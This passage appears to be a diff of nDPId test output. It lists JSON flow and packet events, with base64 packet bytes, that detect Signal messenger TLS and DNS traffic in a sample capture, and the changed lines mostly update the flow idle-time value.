CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247603,"flow_last_seen":1569051247830,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247830,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247603,"flow_last_seen":1569051247830,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247830,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247601,"flow_last_seen":1569051247832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247832,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":72,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247601,"flow_last_seen":1569051247832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247832,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} 00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569051248547,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1569051248547,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIKTAAAP8RkXUAAAAA\/\/\/\/\/wBEAEMBNJw9AQEGACG6jqoABAAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569051253252,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1569051253252,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIKTEAAP8RkXQAAAAA\/\/\/\/\/wBEAEMBNJw4AQEGACG6jqoACQAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051255515,"flow_last_seen":1569051255515,"flow_idle_time":7440000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1569051255515,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1569051255515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1569051255515,"pkt":"xiwDYGpkxGGLNYKpCABFAABiAABAAEAG01TAqAIREfiSkN6kAbu8mMGjrFDpOoAYBADERQAAAQEICihVb2TeKRePFwMDACkAAAAAAAAAByneD5KHf7LhXiN5Pdq3wP31zhE4MGciEgckOq75+f9F5w=="} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1569051255515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1569051255515,"pkt":"xiwDYGpkxGGLNYKpCABFAABTAABAAEAG02PAqAIREfiSkN6kAbu8mMHRrFDpOoAYBABt7AAAAQEICihVb2XeKRePFQMDABoAAAAAAAAACJW1v\/IhTp91V+O68DpoE88kag=="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1569051255515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051255515,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG04LAqAIREfiSkN6kAbu8mMHwrFDpOoARBACJkgAAAQEICihVb2XeKReP"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051257169,"flow_last_seen":1569051257169,"flow_idle_time":7440000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":1,"thread_ts_msec":1569051257169,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1569051257169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1569051257169,"pkt":"xiwDYGpkxGGLNYKpCABFAABLAABAAEAGjWvAqAIRAhLodt65Absqy4Q4WMZypYAYBABE5AAAAQEICihVdq6vX9qZFQMDABKEOlUEciue5QZs7g3+sWQHUk8="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1569051257169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051257169,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGjYLAqAIRAhLodt65Absqy4RPWMZypYARBABBggAAAQEICihVdq6vX9qZ"} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1569051257192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1569051257192,"pkt":"xGGLNYKpxiwDYGpkCABFAABL884AADUG5JwCEuh2wKgCEQG73rlYxnKlKsuET4AYAQIBNAAAAQEICq9gUAcoVXauFQMDABK6ebhIWf6gqCdSaZoYDdKf06A="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264073,"flow_last_seen":1569051264073,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264073,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1569051264073,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264073,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKMBLAbsF0WXIAAAAALAC\/\/9prAAAAgQFtAEDAwYBAQgKKFWN0AAAAAAEAgAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264078,"flow_last_seen":1569051264078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264078,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1569051264078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264078,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGSLbAqAIRFzkYEN6+AbvH3a+JAAAAALAC\/\/8ydQAAAgQFtAEDAwcBAQgKKFWSTQAAAAAEAgAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051255515,"flow_last_seen":1569051255515,"flow_idle_time":7560000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1569051255515,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1569051255515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1569051255515,"pkt":"xiwDYGpkxGGLNYKpCABFAABiAABAAEAG01TAqAIREfiSkN6kAbu8mMGjrFDpOoAYBADERQAAAQEICihVb2TeKRePFwMDACkAAAAAAAAAByneD5KHf7LhXiN5Pdq3wP31zhE4MGciEgckOq75+f9F5w=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1569051255515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1569051255515,"pkt":"xiwDYGpkxGGLNYKpCABFAABTAABAAEAG02PAqAIREfiSkN6kAbu8mMHRrFDpOoAYBABt7AAAAQEICihVb2XeKRePFQMDABoAAAAAAAAACJW1v\/IhTp91V+O68DpoE88kag=="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1569051255515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051255515,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG04LAqAIREfiSkN6kAbu8mMHwrFDpOoARBACJkgAAAQEICihVb2XeKReP"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051257169,"flow_last_seen":1569051257169,"flow_idle_time":7560000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":1,"thread_ts_msec":1569051257169,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1569051257169,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1569051257169,"pkt":"xiwDYGpkxGGLNYKpCABFAABLAABAAEAGjWvAqAIRAhLodt65Absqy4Q4WMZypYAYBABE5AAAAQEICihVdq6vX9qZFQMDABKEOlUEciue5QZs7g3+sWQHUk8="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1569051257169,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051257169,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGjYLAqAIRAhLodt65Absqy4RPWMZypYARBABBggAAAQEICihVdq6vX9qZ"} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1569051257192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1569051257192,"pkt":"xGGLNYKpxiwDYGpkCABFAABL884AADUG5JwCEuh2wKgCEQG73rlYxnKlKsuET4AYAQIBNAAAAQEICq9gUAcoVXauFQMDABK6ebhIWf6gqCdSaZoYDdKf06A="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264073,"flow_last_seen":1569051264073,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264073,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1569051264073,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264073,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKMBLAbsF0WXIAAAAALAC\/\/9prAAAAgQFtAEDAwYBAQgKKFWN0AAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264078,"flow_last_seen":1569051264078,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264078,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1569051264078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264078,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGSLbAqAIRFzkYEN6+AbvH3a+JAAAAALAC\/\/8ydQAAAgQFtAEDAwcBAQgKKFWSTQAAAAAEAgAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":174,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264088,"flow_last_seen":1569051264088,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569051264088,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1569051264088,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1569051264088,"pkt":"xiwDYGpkxGGLNYKpCABFAABTylIAAP8Ra+TAqAIRwKgCAdvHADUAPyTGAMEBAAABAAAAAAAAEnRleHRzZWN1cmUtc2VydmljZQ53aGlzcGVyc3lzdGVtcwNvcmcAAAEAAQ=="} 00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264088,"flow_last_seen":1569051264088,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569051264088,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Signal","breed":"Fun","category":"Chat"},"dns": {"query":"textsecure-service.whispersystems.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264090,"flow_last_seen":1569051264090,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264090,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1569051264090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264090,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN6\/Abvpz5RJAAAAALAC\/\/80LQAAAgQFtAEDAwcBAQgKKFWSWgAAAAAEAgAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264091,"flow_last_seen":1569051264091,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264091,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1569051264091,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264091,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN7AAbuO10RdAAAAALAC\/\/\/fDwAAAgQFtAEDAwcBAQgKKFWSWwAAAAAEAgAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264093,"flow_last_seen":1569051264093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264093,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1569051264093,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264093,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN7BAbuYIIuMAAAAALAC\/\/+OlgAAAgQFtAEDAwcBAQgKKFWSWwAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1569051264113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264113,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADQGlLoXORgQwKgCEQG73r7gO6oYx92viqAScSBHlgAAAgQFrAQCCAqWTmoXKFWSTQEDAwc="} 